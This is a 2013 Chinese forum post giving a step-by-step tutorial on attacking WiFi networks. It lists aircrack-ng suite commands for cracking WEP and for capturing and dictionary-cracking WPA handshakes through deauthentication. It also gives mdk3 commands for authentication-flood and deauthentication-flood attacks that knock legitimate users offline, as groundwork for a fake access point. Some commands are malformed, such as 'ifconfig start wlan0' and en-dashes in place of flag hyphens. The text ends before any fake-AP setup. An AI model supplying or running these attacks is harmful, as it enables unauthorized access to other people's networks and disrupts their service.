管理员
|
阅读:4846回复:0
怎样利用伪造的AP拿到WiFi密码
楼主#
更多
发布于:2013-01-18 08:55
| | | | 00×01 介绍 不管使用什么系统,一定要把网卡激活成为monitor模式,这样软件才可以识别 iwconfig //查看网卡 ifconfig start wlan0 //启动wlan0网卡 airmon-ng start wlan0 //将网卡激活成monitor模式,一般为mon0 WEP airodump-ng --ivs –w log –c频道wlan0 //wep用ivs过滤报文即可,速度快 aireplay-ng -3 –b bssid –h clientMac mon0 //采用ARPRequesr来迅速加大数据量 aircrack-ng ivs文件 //破解捕获来的ivs文件 wep用这几个命令足以了 WPA/WPA2 airodump-ng –c频道–w log mon0 //wpa正常抓包即可 aireplay-ng -0 3 –a BSSID –c clientMAC wlan0 //发动Deauth攻击获取完整的handshake提示获取成功,即可破解抓来的数据包 aircrack-ng –w字典文件捕获的cap文件 //WPA破解完全靠字典,需要有耐心 其实说到这里,hash破解速录会大大提升,只是利用字典制作hashtable的时候需要花好长的时间,但是破解是aircrack的几十倍. 常见的几种DOS攻击: Authentication Flood、Deauthentication Flood、Disassociation Flood、RFJamming、Association Flood等 00×02 利用工具 本次我们还是依赖于BT5下一款强大的工具,mdk3 现在大部分无线下的工具都是利用mdk3为基本内核来开发的,所以其性能就不用多说了. 针对路由器,我们可以发动Authentication Flood,mdk3下参数为a,此攻击是针对无线AP的洪水攻击, 又叫做身份验证攻击.其原理就是向AP发动大量的虚假的链接请求,这种请求数量一旦超过了无线AP所能承受的范围, AP就会自动断开现有链接,使合法用户无法使用无线网络 mdk3 mon0 a –a AP的MAC地址(BSSID) 可以看到发动的同时,有大量虚假的客户端对AP进行连接,这些client MAC地址也都是随机伪造的 a 此时我们可以通过-c来对指定的频道进行攻击,-a固定bssid进行攻击,-s控制发包速率.一般默认的是200个包/秒, 这样我们持续的攻击下去,无线网络在几分钟之内就会瘫痪,但是问题是,如果我们遇到一个能承载大量用户的AP客户端,那么我们该怎么办呢? 别急,下面我们就来使用当初我们获得handshake时候使用过的Deauthentication Flood, 记得么,当初我们使用aireplay-ng-0来发动使其断线来获取握手包,其实aireplay-ng即可发动,只要不控制发包数量,并随机频道即可,但是相比mdk3效率并不高. 这种攻击不是针对AP的,而是针对于client MAC. mdk3 mon0 d 攻击开始了 可以看到,我的网络瞬间断断续续,当我停止后,网络恢复 此时我们可以利用-s参数来加快发包速率.这种效率是非常高的,一般发动开始,client便开始断网. 另外我们可以使用-w(白名单) –b(黑名单)来添加我们的mac地址,这样我们就可以使自己伪造的AP永远的不受自己的攻击所影响, 而黑白名单可以写单独的一个mac也可以写文件的绝对路径,然后把要加入名单的mac写在文件里. 伪造AP 首先我们需要一块支持AP的无线网卡,或者直接上无线路由器,或者做热点,做ap方法网上很多很多, 这个大家可以自己找下.
| | | | |
|